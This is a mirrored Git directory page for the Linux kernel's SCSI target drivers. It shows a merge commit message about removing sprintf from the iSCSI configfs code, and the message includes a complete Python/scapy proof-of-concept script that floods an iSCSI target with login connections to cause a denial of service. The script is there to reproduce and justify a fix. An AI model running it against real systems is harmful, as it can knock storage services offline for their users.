Kernel/linux
1
0
Fork 0
mirror of https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git synced 2025-01-07 13:53:24 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
31799f9e6a
linux/drivers/target
History
Martin K. Petersen 31799f9e6a Merge patch series "scsi: target: iscsi: Get rid of sprintf in iscsi_target_configfs.c" 
Konstantin Shelekhin <k.shelekhin@yadro.com> says:

This patch series cleanses iscsi_target_configfs.c of sprintf
usage. The first patch fixes the real problem, the second just makes
sure we are on the safe side from now on.

I've reproduced the issue fixed in the first patch by utilizing this
cool thing:

  https://git.sr.ht/~kshelekhin/scapy-iscsi

Yeah, shameless promoting of my own tools, but I like the simplicity
of scapy and writing tests in C with libiscsi can be a little
cumbersome.

Check it out:

  #!/usr/bin/env python3
  # Let's cause some DoS in iSCSI target

  import sys

  from scapy.supersocket import StreamSocket
  from scapy_iscsi.iscsi import *

  cpr = {
      "InitiatorName": "iqn.2016-04.com.open-iscsi:e476cd9e4e59",
      "TargetName": "iqn.2023-07.com.example:target",
      "HeaderDigest": "None",
      "DataDigest": "None",
  }

  spr = {
      "SessionType": "Normal",
      "ErrorRecoveryLevel": 0,
      "DefaultTime2Retain": 0,
      "DefaultTime2Wait": 2,
      "ImmediateData": "Yes",
      "FirstBurstLength": 65536,
      "MaxBurstLength": 262144,
      "MaxRecvDataSegmentLength": 262144,
      "MaxOutstandingR2T": 1,
  }

  if len(sys.argv) != 3:
      print("usage: dos.py <host> <port>", file=sys.stderr)
      exit(1)

  host = sys.argv[1]
  port = int(sys.argv[2])
  isid = 0xB00B
  tsih = 0
  connections = []

  for i in range(0, 127):
      s = socket.socket()
      s.connect((host, port))
      s = StreamSocket(s, ISCSI)

      ds = cpr if i > 0 else cpr | spr
      lirq = ISCSI() / LoginRequest(isid=isid, tsih=tsih, cid=i, ds=kv2text(ds))
      lirs = s.sr1(lirq)
      tsih = lirs.tsih

      connections.append(s)

  input()

Link: https://lore.kernel.org/r/20230722152657.168859-1-k.shelekhin@yadro.com
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2023-07-31 12:11:17 -04:00
..
iscsi Merge patch series "scsi: target: iscsi: Get rid of sprintf in iscsi_target_configfs.c" 2023-07-31 12:11:17 -04:00
loopback scsi: target: tcm_loop: Remove redundant driver match function 2023-03-24 20:44:14 -04:00
sbp scsi: target: sbp: Remove default fabric ops callouts 2023-03-16 23:36:36 -04:00
tcm_fc scsi: target: fcoe: Remove default fabric ops callouts 2023-03-16 23:36:36 -04:00
tcm_remote scsi: target: Add virtual remote target 2023-03-16 23:36:37 -04:00
Kconfig scsi: target: Add virtual remote target 2023-03-16 23:36:37 -04:00
Makefile scsi: target: Add virtual remote target 2023-03-16 23:36:37 -04:00
target_core_alua.c scsi: target: core: Use RTPI from target port 2023-03-09 21:29:23 -05:00
target_core_alua.h Merge branch 'for-next' of git://git.kernel.org/pub/scm/linux/kernel/git/nab/target-pending 2017-11-24 19:19:20 -10:00
target_core_configfs.c scsi: target: Replace all non-returning strlcpy() with strscpy() 2023-05-16 21:39:44 -04:00
target_core_device.c scsi: target: Replace all non-returning strlcpy() with strscpy() 2023-05-16 21:39:44 -04:00
target_core_fabric_configfs.c scsi: target: core: Fix invalid memory access 2023-04-11 20:49:43 -04:00
target_core_fabric_lib.c scsi: target: Handle short iSIDs 2020-07-08 00:14:34 -04:00
target_core_file.c scsi: target: Rename sbc_ops to exec_cmd_ops 2023-04-11 21:55:36 -04:00
target_core_file.h scsi: target: target/file: Add support of direct and async I/O 2018-05-14 22:40:08 -04:00
target_core_hba.c treewide: Replace GPLv2 boilerplate/reference with SPDX - rule 156 2019-05-30 11:26:35 -07:00
target_core_iblock.c SCSI misc on 20230708 2023-07-08 12:35:18 -07:00
target_core_iblock.h scsi: target: iblock: Add backend plug/unplug callouts 2021-03-04 17:37:02 -05:00
target_core_internal.h Merge patch series "target: TMF and recovery fixes" 2023-03-24 17:39:15 -04:00
target_core_pr.c Merge patch series "Use block pr_ops in LIO" 2023-05-22 16:35:02 -04:00
target_core_pr.h scsi: target: core: Unify NAA identifier generation 2021-05-15 14:14:28 -04:00
target_core_pscsi.c block: replace fmode_t with a block-specific type for block open flags 2023-06-12 08:04:05 -06:00
target_core_pscsi.h scsi: target: pscsi: Remove struct pscsi_plugin_task 2022-03-01 22:21:49 -05:00
target_core_rd.c scsi: target: Rename sbc_ops to exec_cmd_ops 2023-04-11 21:55:36 -04:00
target_core_rd.h scsi: target: Add the DUMMY flag to rd_mcp 2021-04-05 23:26:38 -04:00
target_core_sbc.c scsi: target: Rename sbc_ops to exec_cmd_ops 2023-04-11 21:55:36 -04:00
target_core_spc.c Merge patch series "Use block pr_ops in LIO" 2023-05-22 16:35:02 -04:00
target_core_stat.c scsi: target: core: Use RTPI from target port 2023-03-09 21:29:23 -05:00
target_core_tmr.c scsi: target: Fix multiple LUN_RESET handling 2023-03-24 17:32:23 -04:00
target_core_tpg.c Merge patch series "target: TMF and recovery fixes" 2023-03-24 17:39:15 -04:00
target_core_transport.c scsi: target: core: Fix error path in target_setup_session() 2023-06-14 21:54:35 -04:00
target_core_ua.c scsi: target: use an enum to track emulate_ua_intlck_ctrl 2020-02-21 17:37:16 -05:00
target_core_ua.h scsi: target: Fix handling of removed LUNs 2018-07-02 16:44:32 -04:00
target_core_user.c scsi: target: tcmu: Replace strlcpy() with strscpy() 2023-06-21 21:13:00 -04:00
target_core_xcopy.c scsi: target: Pass in cmd counter to use during cmd setup 2023-03-24 17:32:23 -04:00
target_core_xcopy.h scsi: target: core: Change the way target_xcopy_do_work() sets restiction on max I/O 2022-11-24 02:16:19 +00:00